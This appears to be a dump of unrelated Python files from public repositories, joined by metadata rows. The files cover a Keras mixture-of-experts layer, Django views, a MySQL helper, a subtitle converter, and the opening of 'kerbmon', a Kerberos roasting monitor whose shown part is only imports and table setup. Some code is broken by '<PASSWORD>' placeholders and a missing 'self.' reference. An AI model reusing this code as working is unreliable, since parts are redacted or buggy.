gating_kernel_initializer_scale=1.0,
expert_bias_initializer='zeros',
gating_bias_initializer='zeros',
expert_kernel_regularizer=None,
gating_kernel_regularizer=None,
expert_bias_regularizer=None,
gating_bias_regularizer=None,
expert_kernel_constraint=None,
gating_kernel_constraint=None,
expert_bias_constraint=None,
gating_bias_constraint=None,
activity_regularizer=None,
**kwargs):
super(_ConvMoE, self).__init__(**kwargs)
self.rank = rank
self.n_filters = n_filters
self.n_experts_per_filter = n_experts_per_filter
self.n_total_filters = self.n_filters * self.n_experts_per_filter
self.kernel_size = conv_utils.normalize_tuple(kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
self.data_format = conv_utils.normalize_data_format(data_format)
self.dilation_rate = conv_utils.normalize_tuple(dilation_rate, rank, 'dilation_rate')
self.expert_activation = activations.get(expert_activation)
self.gating_activation = activations.get(gating_activation)
self.use_expert_bias = use_expert_bias
self.use_gating_bias = use_gating_bias
self.expert_kernel_initializer_scale = expert_kernel_initializer_scale
self.gating_kernel_initializer_scale = gating_kernel_initializer_scale
self.expert_bias_initializer = initializers.get(expert_bias_initializer)
self.gating_bias_initializer = initializers.get(gating_bias_initializer)
self.expert_kernel_regularizer = regularizers.get(expert_kernel_regularizer)
self.gating_kernel_regularizer = regularizers.get(gating_kernel_regularizer)
self.expert_bias_regularizer = regularizers.get(expert_bias_regularizer)
self.gating_bias_regularizer = regularizers.get(gating_bias_regularizer)
self.expert_kernel_constraint = constraints.get(expert_kernel_constraint)
self.gating_kernel_constraint = constraints.get(gating_kernel_constraint)
self.expert_bias_constraint = constraints.get(expert_bias_constraint)
self.gating_bias_constraint = constraints.get(gating_bias_constraint)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.input_spec = InputSpec(ndim=self.rank + 2)
def build(self, input_shape):
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape[channel_axis] is None:
raise ValueError('The channel dimension of the inputs should be defined. Found `None`.')
input_dim = input_shape[channel_axis]
expert_init_std = self.expert_kernel_initializer_scale / np.sqrt(input_dim*np.prod(self.kernel_size))
gating_init_std = self.gating_kernel_initializer_scale / np.sqrt(np.prod(input_shape[1:]))
expert_kernel_shape = self.kernel_size + (input_dim, self.n_total_filters)
self.expert_kernel = self.add_weight(shape=expert_kernel_shape,
initializer=RandomNormal(mean=0., stddev=expert_init_std),
name='expert_kernel',
regularizer=self.expert_kernel_regularizer,
constraint=self.expert_kernel_constraint)
gating_kernel_shape = input_shape[1:] + (self.n_filters, self.n_experts_per_filter)
self.gating_kernel = self.add_weight(shape=gating_kernel_shape,
initializer=RandomNormal(mean=0., stddev=gating_init_std),
name='gating_kernel',
regularizer=self.gating_kernel_regularizer,
constraint=self.gating_kernel_constraint)
if self.use_expert_bias:
expert_bias_shape = ()
for i in range(self.rank):
expert_bias_shape = expert_bias_shape + (1,)
expert_bias_shape = expert_bias_shape + (self.n_filters, self.n_experts_per_filter)
self.expert_bias = self.add_weight(shape=expert_bias_shape,
initializer=self.expert_bias_initializer,
name='expert_bias',
regularizer=self.expert_bias_regularizer,
constraint=self.expert_bias_constraint)
else:
self.expert_bias = None
if self.use_gating_bias:
self.gating_bias = self.add_weight(shape=(self.n_filters, self.n_experts_per_filter),
initializer=self.gating_bias_initializer,
name='gating_bias',
regularizer=self.gating_bias_regularizer,
constraint=self.gating_bias_constraint)
else:
self.gating_bias = None
self.o_shape = self.compute_output_shape(input_shape=input_shape)
self.new_gating_outputs_shape = (-1,)
for i in range(self.rank):
self.new_gating_outputs_shape = self.new_gating_outputs_shape + (1,)
self.new_gating_outputs_shape = self.new_gating_outputs_shape + (self.n_filters, self.n_experts_per_filter)
# Set input spec.
self.input_spec = InputSpec(ndim=self.rank + 2, axes={channel_axis: input_dim})
self.built = True
def call(self, inputs):
if self.rank == 1:
expert_outputs = K.conv1d(
inputs,
self.expert_kernel,
strides=self.strides[0],
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate[0])
if self.rank == 2:
expert_outputs = K.conv2d(
inputs,
self.expert_kernel,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate)
if self.rank == 3:
expert_outputs = K.conv3d(
inputs,
self.expert_kernel,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate)
expert_outputs = K.reshape(expert_outputs, (-1,) + self.o_shape[1:-1] + (self.n_filters, self.n_experts_per_filter))
if self.use_expert_bias:
expert_outputs = K.bias_add(
expert_outputs,
self.expert_bias,
data_format=self.data_format)
if self.expert_activation is not None:
expert_outputs = self.expert_activation(expert_outputs)
gating_outputs = tf.tensordot(inputs, self.gating_kernel, axes=self.rank+1) # samples x n_filters x n_experts_per_filter
if self.use_gating_bias:
gating_outputs = K.bias_add(
gating_outputs,
self.gating_bias,
data_format=self.data_format)
if self.gating_activation is not None:
gating_outputs = self.gating_activation(gating_outputs)
gating_outputs = K.reshape(gating_outputs, self.new_gating_outputs_shape)
outputs = K.sum(expert_outputs * gating_outputs, axis=-1, keepdims=False)
return outputs
def compute_output_shape(self, input_shape):
if self.data_format == 'channels_last':
space = input_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return (input_shape[0],) + tuple(new_space) + (self.n_filters,)
if self.data_format == 'channels_first':
space = input_shape[2:]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return (input_shape[0], self.n_filters) + tuple(new_space)
def get_config(self):
config = {
'rank': self.rank,
'n_filters': self.n_filters,
'n_experts_per_filter':n_experts_per_filter,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'expert_activation': activations.serialize(self.expert_activation),
'gating_activation': activations.serialize(self.gating_activation),
'use_expert_bias': self.use_expert_bias,
'use_gating_bias': self.use_gating_bias,
'expert_kernel_initializer_scale':self.expert_kernel_initializer_scale,
'gating_kernel_initializer_scale':self.gating_kernel_initializer_scale,
'expert_bias_initializer': initializers.serialize(self.expert_bias_initializer),
'gating_bias_initializer': initializers.serialize(self.gating_bias_initializer),
'expert_kernel_regularizer': regularizers.serialize(self.expert_kernel_regularizer),
'gating_kernel_regularizer': regularizers.serialize(self.gating_kernel_regularizer),
'expert_bias_regularizer': regularizers.serialize(self.expert_bias_regularizer),
'gating_bias_regularizer': regularizers.serialize(self.gating_bias_regularizer),
'expert_kernel_constraint': constraints.serialize(self.expert_kernel_constraint),
'gating_kernel_constraint': constraints.serialize(self.gating_kernel_constraint),
'expert_bias_constraint': constraints.serialize(self.expert_bias_constraint),
'gating_bias_constraint': constraints.serialize(self.gating_bias_constraint),
'activity_regularizer': regularizers.serialize(self.activity_regularizer)
}
base_config = super(_ConvMoE, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Conv1DMoE(_ConvMoE):
"""1D convolution layer (e.g. temporal convolution).
# Input shape
3D tensor with shape: `(batch_size, steps, input_dim)`
# Output shape
3D tensor with shape: `(batch_size, new_steps, n_filters)`
`steps` value might have changed due to padding or strides.
"""
def __init__(self,
n_filters,
n_experts_per_filter,
kernel_size,
strides=1,
padding='valid',
data_format='channels_last',
dilation_rate=1,
expert_activation=None,
gating_activation=None,
use_expert_bias=True,
use_gating_bias=True,
expert_kernel_initializer_scale=1.0,
gating_kernel_initializer_scale=1.0,
expert_bias_initializer='zeros',
gating_bias_initializer='zeros',
expert_kernel_regularizer=None,
gating_kernel_regularizer=None,
expert_bias_regularizer=None,
gating_bias_regularizer=None,
expert_kernel_constraint=None,
gating_kernel_constraint=None,
expert_bias_constraint=None,
gating_bias_constraint=None,
activity_regularizer=None,
**kwargs):
if padding == 'causal':
if data_format != 'channels_last':
raise ValueError('When using causal padding in `Conv1DMoE`, `data_format` must be "channels_last" (temporal data).')
super(Conv1DMoE, self).__init__(
rank=1,
n_filters=n_filters,
n_experts_per_filter=n_experts_per_filter,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
expert_activation=expert_activation,
gating_activation=gating_activation,
use_expert_bias=use_expert_bias,
use_gating_bias=use_gating_bias,
expert_kernel_initializer_scale=expert_kernel_initializer_scale,
gating_kernel_initializer_scale=gating_kernel_initializer_scale,
expert_bias_initializer=expert_bias_initializer,
gating_bias_initializer=gating_bias_initializer,
expert_kernel_regularizer=expert_kernel_regularizer,
gating_kernel_regularizer=gating_kernel_regularizer,
expert_bias_regularizer=expert_bias_regularizer,
gating_bias_regularizer=gating_bias_regularizer,
expert_kernel_constraint=expert_kernel_constraint,
gating_kernel_constraint=gating_kernel_constraint,
expert_bias_constraint=expert_bias_constraint,
gating_bias_constraint=gating_bias_constraint,
activity_regularizer=activity_regularizer,
**kwargs)
self.input_spec = InputSpec(ndim=3)
def get_config(self):
config = super(Conv1DMoE, self).get_config()
config.pop('rank')
return config
class Conv2DMoE(_ConvMoE):
"""2D convolution layer (e.g. spatial convolution over images).
# Input shape
4D tensor with shape:
`(samples, channels, rows, cols)`
if `data_format` is `"channels_first"`
or 4D tensor with shape:
`(samples, rows, cols, channels)`
if `data_format` is `"channels_last"`.
# Output shape
4D tensor with shape:
`(samples, n_filters, new_rows, new_cols)`
if `data_format` is `"channels_first"`
or 4D tensor with shape:
`(samples, new_rows, new_cols, n_filters)`
if `data_format` is `"channels_last"`.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
n_filters,
n_experts_per_filter,
kernel_size,
strides=(1,1),
padding='valid',
data_format='channels_last',
dilation_rate=(1,1),
expert_activation=None,
gating_activation=None,
use_expert_bias=True,
use_gating_bias=True,
expert_kernel_initializer_scale=1.0,
gating_kernel_initializer_scale=1.0,
expert_bias_initializer='zeros',
gating_bias_initializer='zeros',
expert_kernel_regularizer=None,
gating_kernel_regularizer=None,
expert_bias_regularizer=None,
gating_bias_regularizer=None,
expert_kernel_constraint=None,
gating_kernel_constraint=None,
expert_bias_constraint=None,
gating_bias_constraint=None,
activity_regularizer=None,
**kwargs):
super(Conv2DMoE, self).__init__(
rank=2,
n_filters=n_filters,
n_experts_per_filter=n_experts_per_filter,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
expert_activation=expert_activation,
gating_activation=gating_activation,
use_expert_bias=use_expert_bias,
use_gating_bias=use_gating_bias,
expert_kernel_initializer_scale=expert_kernel_initializer_scale,
gating_kernel_initializer_scale=gating_kernel_initializer_scale,
expert_bias_initializer=expert_bias_initializer,
gating_bias_initializer=gating_bias_initializer,
expert_kernel_regularizer=expert_kernel_regularizer,
gating_kernel_regularizer=gating_kernel_regularizer,
expert_bias_regularizer=expert_bias_regularizer,
gating_bias_regularizer=gating_bias_regularizer,
expert_kernel_constraint=expert_kernel_constraint,
gating_kernel_constraint=gating_kernel_constraint,
expert_bias_constraint=expert_bias_constraint,
gating_bias_constraint=gating_bias_constraint,
activity_regularizer=activity_regularizer,
**kwargs)
self.input_spec = InputSpec(ndim=4)
def get_config(self):
config = super(Conv2DMoE, self).get_config()
config.pop('rank')
return config
class Conv3DMoE(_ConvMoE):
"""3D convolution layer (e.g. spatial convolution over volumes).
# Input shape
5D tensor with shape:
`(samples, channels, conv_dim1, conv_dim2, conv_dim3)`
if `data_format` is `"channels_first"`
or 5D tensor with shape:
`(samples, conv_dim1, conv_dim2, conv_dim3, channels)`
if `data_format` is `"channels_last"`.
# Output shape
5D tensor with shape:
`(samples, n_filters, new_conv_dim1, new_conv_dim2, new_conv_dim3)`
if `data_format` is `"channels_first"`
or 5D tensor with shape:
`(samples, new_conv_dim1, new_conv_dim2, new_conv_dim3, n_filters)`
if `data_format` is `"channels_last"`.
`new_conv_dim1`, `new_conv_dim2` and `new_conv_dim3` values might have changed due to padding.
"""
def __init__(self,
n_filters,
n_experts_per_filter,
kernel_size,
strides=(1,1,1),
padding='valid',
data_format='channels_last',
dilation_rate=(1,1,1),
expert_activation=None,
gating_activation=None,
use_expert_bias=True,
use_gating_bias=True,
expert_kernel_initializer_scale=1.0,
gating_kernel_initializer_scale=1.0,
expert_bias_initializer='zeros',
gating_bias_initializer='zeros',
expert_kernel_regularizer=None,
gating_kernel_regularizer=None,
expert_bias_regularizer=None,
gating_bias_regularizer=None,
expert_kernel_constraint=None,
gating_kernel_constraint=None,
expert_bias_constraint=None,
gating_bias_constraint=None,
activity_regularizer=None,
**kwargs):
super(Conv3DMoE, self).__init__(
rank=3,
n_filters=n_filters,
n_experts_per_filter=n_experts_per_filter,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
expert_activation=expert_activation,
gating_activation=gating_activation,
use_expert_bias=use_expert_bias,
use_gating_bias=use_gating_bias,
expert_kernel_initializer_scale=expert_kernel_initializer_scale,
gating_kernel_initializer_scale=gating_kernel_initializer_scale,
expert_bias_initializer=expert_bias_initializer,
gating_bias_initializer=gating_bias_initializer,
expert_kernel_regularizer=expert_kernel_regularizer,
gating_kernel_regularizer=gating_kernel_regularizer,
expert_bias_regularizer=expert_bias_regularizer,
gating_bias_regularizer=gating_bias_regularizer,
expert_kernel_constraint=expert_kernel_constraint,
gating_kernel_constraint=gating_kernel_constraint,
expert_bias_constraint=expert_bias_constraint,
gating_bias_constraint=gating_bias_constraint,
activity_regularizer=activity_regularizer,
**kwargs)
self.input_spec = InputSpec(ndim=5)
def get_config(self):
config = super(Conv3DMoE, self).get_config()
config.pop('rank')
return config
# Aliases
Convolution1DMoE = Conv1DMoE
Convolution2DMoE = Conv2DMoE
Convolution3DMoE = Conv3DMoE
| 2.265625
| 2
|
c.ppy.sh/databaseHelper.py
|
Kreyren/ripple
| 53
|
12784825
|
<gh_stars>10-100
import pymysql
import bcolors
import consoleHelper
import threading
class db:
"""A MySQL database connection"""
connection = None
disconnected = False
pingTime = 600
def __init__(self, __host, __username, __password, __database, __pingTime = 600):
"""
Connect to MySQL database
__host -- MySQL host name
__username -- MySQL username
__password -- <PASSWORD>
__database -- MySQL database name
__pingTime -- MySQL database ping time (default: 600)
"""
self.connection = pymysql.connect(host=__host, user=__username, password=__password, db=__database, cursorclass=pymysql.cursors.DictCursor, autocommit=True)
self.pingTime = __pingTime
self.pingLoop()
def bindParams(self, __query, __params):
"""
Replace every ? with the respective **escaped** parameter in array
__query -- query with ?s
__params -- array with params
return -- new query
"""
for i in __params:
escaped = self.connection.escape(i)
__query = __query.replace("?", str(escaped), 1)
return __query
def execute(self, __query, __params = None):
"""
Execute a SQL query
__query -- query, can contain ?s
__params -- array with params. Optional
"""
with self.connection.cursor() as cursor:
try:
# Bind params if needed
if __params != None:
__query = self.bindParams(__query, __params)
# Execute the query
cursor.execute(__query)
finally:
# Close this connection
cursor.close()
def fetch(self, __query, __params = None, __all = False):
"""
Fetch the first (or all) element(s) of SQL query result
__query -- query, can contain ?s
__params -- array with params. Optional
__all -- if true, will fetch all values. Same as fetchAll
return -- dictionary with result data or False if failed
"""
with self.connection.cursor() as cursor:
try:
# Bind params if needed
if __params != None:
__query = self.bindParams(__query, __params)
# Execute the query with binded params
cursor.execute(__query)
# Get first result and return it
if __all == False:
return cursor.fetchone()
else:
return cursor.fetchall()
finally:
# Close this connection
cursor.close()
def fetchAll(self, __query, __params = None):
"""
Fetch the all elements of SQL query result
__query -- query, can contain ?s
__params -- array with params. Optional
return -- dictionary with result data
"""
return self.fetch(__query, __params, True)
def pingLoop(self):
"""
Pings MySQL server. We need to ping/execute a query at least once every 8 hours
or the connection will die.
If called once, will recall after 30 minutes and so on, forever
CALL THIS FUNCTION ONLY ONCE!
"""
# Default loop time
time = self.pingTime
# Make sure the connection is alive
try:
# Try to ping and reconnect if not connected
self.connection.ping()
if self.disconnected == True:
# If we were disconnected, set disconnected to false and print message
self.disconnected = False
consoleHelper.printColored("> Reconnected to MySQL server!", bcolors.GREEN)
except:
# Can't ping MySQL server. Show error and call loop in 5 seconds
consoleHelper.printColored("[!] CRITICAL!! MySQL connection died! Make sure your MySQL server is running! Checking again in 5 seconds...", bcolors.RED)
self.disconnected = True
time = 5
# Schedule a new check (endless loop)
threading.Timer(time, self.pingLoop).start()
| 2.953125
| 3
|
tests/cases/stats/tests/__init__.py
|
murphyke/avocado
| 0
|
12784826
|
from .agg import *
from .kmeans import *
| 1.039063
| 1
|
Professor_Dados/Core/views.py
|
Francisco-Carlos/Site-Professor
| 1
|
12784827
|
from django.shortcuts import render, redirect, get_object_or_404
from .models import Conteudos
from django.contrib.auth.models import User,auth
from pytube import YouTube
# Create your views here.
def Index(request):
arquivo = Conteudos.objects.all()
dados = {'arquivo':arquivo}
return render(request,'index.html',dados)
def Dados(request):
arquivos = Conteudos.objects.all()
dados = {'arquivos':arquivos}
return render(request,'Conteudos.html',dados)
def Login(request):
if request.method == 'POST':
email = request.POST['email']
senha = request.POST['senha']
if email == '' or senha == '':
return redirect('login')
if User.objects.filter(email=email).exists():
nome = User.objects.filter(email=email).values_list('username',flat=True).get()
user = auth.authenticate(request,username=nome,password=<PASSWORD>)
if user is not None:
auth.login(request,user)
return redirect('dashbord')
else:
return render(request,'Login.html')
def Sair(request):
auth.logout(request)
return redirect('index')
def Cadastrar(request):
if request.method == 'POST':
nome = request.POST['nome']
email = request.POST['email']
senha_1 = request.POST['senha']
senha_2 = request.POST['senha_2']
if not nome.strip():
redirect('cadastrar')
if not email.strip():
redirect('cadastrar')
if senha_1 != senha_2:
redirect('cadastrar')
if User.objects.filter(email=email).exists():
return redirect('cadastrar')
user = User.objects.create_user(username=nome,email=email,password=<PASSWORD>)
user.save()
return redirect('login')
else:
return render(request,'Cadastrar.html')
def Deletar(request,id):
arq = Conteudos.objects.get(id=id)
arq.delete()
return redirect('dashbord')
def Dashbord(request):
if request.user.is_authenticated:
id = request.user.id
arqui = Conteudos.objects.all().filter(Criador=id)
dados = {'arqui':arqui}
return render(request,'Dashbord.html',dados)
else:
return redirect('Index')
def Criar(request):
if request.method == 'POST':
titulo = request.POST['titulo']
descri = request.POST['descricao']
arqui = request.FILES['arquivo']
user = get_object_or_404(User,pk=request.user.id)
conte = Conteudos.objects.create(Criador=user,Nome=titulo,Conteudo=descri,Arquivo=arqui)
conte.save()
return redirect('dashbord')
else:
return render(request,'Dashbord.html')
def Baixar(request):
if request.method == 'POST':
link = request.POST['link']
caminho = request.POST['caminho']
yt = YouTube(link)
mensagen =' sucesso'
ys = yt.streams.filter(res="360p").first()
ys.download(caminho)
baixar = {'mensagen':mensagen}
return render(request,'Baixar.html',baixar)
else:
return render(request,'Baixar.html')
| 2.390625
| 2
|
indra/indra.py
|
Madjura/text-entailment
| 0
|
12784828
|
<filename>indra/indra.py
import time
import requests
import json
from requests import HTTPError
from urllib3.exceptions import MaxRetryError, NewConnectionError
"""
pairs = [
{'t1': 'house', 't2': 'beer'},
{'t1': 'car', 't2': 'engine'}]
data = {'corpus': 'googlenews',
'model': 'W2V',
'language': 'EN',
'scoreFunction': 'COSINE', 'pairs': pairs}
headers = {
'content-type': "application/json"
}
res = requests.post("http://localhost:8916/relatedness", data=json.dumps(data), headers=headers)
res.raise_for_status()
print(res.json())
"""
def check_relatedness(t1, t2):
if "#" in t1:
t1 = " ".join(t1.split("#")[1].split("_"))
pairs = [
{"t1": t1, "t2": t2}
]
data = {'corpus': 'googlenews',
'model': 'W2V',
'language': 'EN',
'scoreFunction': 'COSINE', 'pairs': pairs}
headers = {
'content-type': "application/json"
}
res = requests.post("http://localhost:8916/relatedness", data=json.dumps(data), headers=headers)
res.raise_for_status()
j = res.json()
return j["pairs"][0]["score"]
def check_relatedness_pairs(pairs):
p = []
for t1, t2 in pairs:
p.append({"t1": t1, "t2": t2})
data = {'corpus': 'googlenews',
'model': 'W2V',
'language': 'EN',
'scoreFunction': 'COSINE', 'pairs': p}
headers = {
'content-type': "application/json"
}
f = False
try:
res = requests.post("http://localhost:8916/relatedness", data=json.dumps(data), headers=headers)
except (ConnectionError, requests.exceptions.ConnectionError, MaxRetryError, NewConnectionError):
time.sleep(5)
print("---ERROR IN INDRA, TRYING AGAIN---")
res = requests.post("http://localhost:8916/relatedness", data=json.dumps(data), headers=headers)
if f:
print("---BLANK---")
return {}
try:
res.raise_for_status()
except HTTPError:
return {} # some sort of problem, go
try:
j = res.json()["pairs"]
except KeyError:
j = {}
dd = {}
for d in j:
t1 = d["t1"]
t2 = d["t2"]
dd[(t1, t2)] = d["score"]
return dd
# print(check_relatedness("picture", "for taking photographs"))
| 2.53125
| 3
|
lib/SurfacingAlgorithms/huji-rich-Elad3DFast/visualisation/two_dimensional/python/hdf5_voronoi_plot.py
|
GalaxyHunters/Vivid
| 0
|
12784829
|
<gh_stars>0
import h5py
import pylab
import numpy
import matplotlib
import sys
import argparse
parser = argparse.ArgumentParser(description='Displays snapshot of the hydrodynamic simualation')
parser.add_argument("file_name",
help="path to snapshot file")
parser.add_argument("field",
help="Name of hydrodynamic variable")
args = parser.parse_args()
h5f = h5py.File(args.file_name)
x_list = numpy.array(h5f['x_coordinate'])
print len(x_list)
y_list = h5f['y_coordinate']
z_list = h5f[args.field]
vert_x_raw = numpy.array(h5f['x position of vertices'])
vert_y_raw = numpy.array(h5f['y position of vertices'])
vert_n_raw = h5f['Number of vertices in cell']
vert_idx_list = numpy.cumsum(vert_n_raw)
z_range = max(z_list) - min(z_list) + 1e-15
z_min = min(z_list)
z_scaled = [(z-z_min)/z_range for z in z_list]
for i in range(len(vert_n_raw)):
upbound = vert_idx_list[i]
if i==0:
lowbound = 0
else:
lowbound = vert_idx_list[i-1]
pylab.fill(vert_x_raw[lowbound:upbound],
vert_y_raw[lowbound:upbound],
fc=matplotlib.cm.jet(z_scaled[i]),
ec='None')
pylab.title(args.field)
ax, _ = matplotlib.colorbar.make_axes(pylab.gca())
matplotlib.colorbar.ColorbarBase(ax,norm=matplotlib.colors.Normalize(vmin=min(z_list),vmax=max(z_list)))
pylab.show()
| 2.09375
| 2
|
src/workers/dialer.py
|
Macsnow14/Thrive-voice
| 0
|
12784830
|
<reponame>Macsnow14/Thrive-voice
# -*- coding: utf-8 -*-
# @Author: Macsnow
# @Date: 2017-05-15 15:14:46
# @Last Modified by: Macsnow
# @Last Modified time: 2017-05-19 16:17:19
import socket
from src.workers.base_worker import BaseWorker
class Dialer(BaseWorker):
def __init__(self, service, mainbox):
self.service = service
self.mainbox = mainbox
super(Dialer, self).__init__()
def __del__(self):
try:
self.dialSocket.close()
except AttributeError:
pass
def run(self):
while True:
msg = self.recv()
self.dialSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if msg['msg'] == 'dialReq':
self.mainbox.put(('e', 'dialing.'))
self.dialSocket.connect((msg['host'], msg['port']))
self.dialSocket.send(('{"code": 0, "message": "%s"}' % (msg['msg'])).encode())
res = self.dialSocket.recv(128).decode()
if res == 'accept':
self.service.anwser(msg['host'], msg['port'] - 1)
# self.dialSocket.send('client_ready')
self.mainbox.put(('c', 'dial_accepted.'))
elif res == 'deny':
self.mainbox.put(('c', 'denied'))
self.dialSocket.close()
elif msg['msg'] == 'hangUp':
self.dialSocket.connect((msg['host'], msg['port']))
self.dialSocket.send('{"code": 0, "message": "remote_hang_up"}'.encode())
self.mainbox.put(('c', 'hang_up', msg['host']))
self.dialSocket.close()
| 2.234375
| 2
|
tests/weight_converter/keras/test_tensorflow.py
|
bioimage-io/python-core
| 2
|
12784831
|
<filename>tests/weight_converter/keras/test_tensorflow.py
import zipfile
def test_tensorflow_converter(any_keras_model, tmp_path):
from bioimageio.core.weight_converter.keras import convert_weights_to_tensorflow_saved_model_bundle
out_path = tmp_path / "weights"
ret_val = convert_weights_to_tensorflow_saved_model_bundle(any_keras_model, out_path)
assert out_path.exists()
assert (out_path / "variables").exists()
assert (out_path / "saved_model.pb").exists()
assert ret_val == 0 # check for correctness is done in converter and returns 0 if it passes
def test_tensorflow_converter_zipped(any_keras_model, tmp_path):
from bioimageio.core.weight_converter.keras import convert_weights_to_tensorflow_saved_model_bundle
out_path = tmp_path / "weights.zip"
ret_val = convert_weights_to_tensorflow_saved_model_bundle(any_keras_model, out_path)
assert out_path.exists()
assert ret_val == 0 # check for correctness is done in converter and returns 0 if it passes
# make sure that the zip package was created correctly
expected_names = {"saved_model.pb", "variables/variables.index"}
with zipfile.ZipFile(out_path, "r") as f:
names = set([name for name in f.namelist()])
assert len(expected_names - names) == 0
| 2.453125
| 2
|
backend/tools/srt2ass.py
|
eritpchy/video-subtitle-extractor
| 2
|
12784832
|
<reponame>eritpchy/video-subtitle-extractor
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import re
import time
import sys
import os
import pysrt
codings = ["utf-8", "utf-16", "utf-32", "gbk", "gb2312", "gb18030", "big5", "cp1252"]
def readings(filename='', content='', encoding=''):
"""
获取文件内容
filename: 文件名
content: 二进制或者字符串
encoding: 文件编码
"""
# 传入的内容不是字符串
if not content:
if not encoding:
for coding in codings:
try:
with open(filename, 'r', encoding=coding) as file:
content = file.read()
break
except (UnicodeDecodeError, UnicodeError):
print(f"使用{coding}解码失败,尝试替换编码格式.")
continue
except FileNotFoundError:
print("未能找到指定文件,程序即将退出.")
time.sleep(3)
sys.exit(1)
else:
with open(filename, 'r', encoding=encoding) as file:
content = file.read()
return content
def srt_timestamps(content):
""" 获取时间轴存于字典中 """
timestamps = []
for ts in re.findall(r'\d{2}:\d{2}:\d{2},\d{3}.+\d{2}:\d{2}:\d{2},\d{3}', content):
ts = ts.split(' --> ')
timestamps.append(ts)
return timestamps
def format_subtitle(text):
subtitle = re.sub('(\r\n)|\n', '\\\\N{\\\\r原文字幕}', text.strip())
return subtitle
def ass_content(filename, header_path):
subs = pysrt.open(filename)
content = readings(filename=header_path) + '\n'
body = {
'dialogue': 'Dialogue: ',
'front_time': '',
'behind_time': '',
'default': 'Default',
'ntp': 'NTP',
'0': '0',
'sub': ',',
}
for sub in subs:
start = '{:0>2d}:{:0>2d}:{:0>2d}.{:0>2d}'.format(sub.start.hours, sub.start.minutes, sub.start.seconds, round(sub.start.milliseconds/10))
end = '{:0>2d}:{:0>2d}:{:0>2d}.{:0>2d}'.format(sub.end.hours, sub.end.minutes, sub.end.seconds, round(sub.end.milliseconds/10))
timeline = ','.join(['0', start, end]) # 合成时间轴
subtitle = format_subtitle(sub.text) # 获取当前字幕
list2str = [ # 字幕列表格式化
body['dialogue'] + timeline,
body['default'],
body['ntp'],
body['0'],
body['0'],
body['0'] + ',',
subtitle]
content += ','.join(list2str)
content += '\n'
return content
def srt_to_ass(filename='', content='', **kwargs):
start_time = time.time()
for_json = kwargs.get('for_json')
header_path = kwargs.get('header_path') if kwargs.get('header_path') else 'backend/tools/header.txt'
encoding = kwargs.get('encoding')
content = ass_content(filename, header_path)
end_time = time.time() - start_time
if for_json:
data = {
'time': end_time,
'content': content
}
return data
return content
def write_srt_to_ass(filename):
filename_ass = re.sub(r'\.srt$', '.ass', filename)
with open(filename_ass, 'w', encoding='utf-8') as to_ass:
to_ass.write(srt_to_ass(filename))
print(filename_ass, '[finish]')
if __name__ == '__main__':
if len(sys.argv) > 1:
for i in range(1, len(sys.argv)):
filename = sys.argv[i]
write_srt_to_ass(filename)
else:
print('扫描当前目录下的srt文件...')
lis = [li for li in os.listdir() if re.search(r'\.srt$', li)]
for li in lis:
print(li)
i = input('是否将上述文件转换为ass文件(yes/no):')
while i not in ('yes', 'no'):
i = input('是否将上述文件转换为ass文件(yes/no):')
if i == 'yes':
for li in lis:
filename = li
filename_ass = re.sub(r'\.srt$', '.ass', filename)
with open(filename_ass, 'w', encoding='utf8') as to_ass:
to_ass.write(srt_to_ass(filename))
print("完成...")
else:
print("取消操作...")
time.sleep(5)
| 2.6875
| 3
|
kerbmon.py
|
Retrospected/kerbmon
| 38
|
12784833
|
<reponame>Retrospected/kerbmon
#!/usr/bin/env python
#
# Author:
# @__Retrospect
# https://github.com/Retrospected/kerbmon/
import argparse
import sys
import os
import logging
import sqlite3
import datetime
import random
from binascii import hexlify, unhexlify
import subprocess
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue
from impacket import version
from impacket.ldap import ldap, ldapasn1
from impacket.krb5.asn1 import TGS_REP, AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, seq_set, seq_set_iter
from impacket.krb5.ccache import CCache
from impacket.krb5 import constants
from impacket.examples.utils import parse_credentials
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS, sendReceive, KerberosError
from impacket.krb5.types import KerberosTime, Principal
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION, UF_DONT_REQUIRE_PREAUTH
from impacket.ntlm import compute_lmhash, compute_nthash
class Database:
def __init__(self,db_file):
self.db_file=db_file
def connect_database(self):
self.conn = sqlite3.connect(self.db_file)
self.cursor = self.conn.cursor()
def create_database(self):
self.connect_database()
sql_spn_table = """ CREATE TABLE IF NOT EXISTS spn (
id integer PRIMARY KEY AUTOINCREMENT,
domain text NOT NULL,
servicePrincipalName text NOT NULL,
sAMAccountName text NOT NULL,
pwdLastSetDate text NOT NULL
); """
sql_np_table = """ CREATE TABLE IF NOT EXISTS np (
id integer PRIMARY KEY AUTOINCREMENT,
domain text NOT NULL,
sAMAccountName text NOT NULL,
pwdLastSetDate text NOT NULL
); """
if self.cursor is not None:
self.create_table(sql_spn_table)
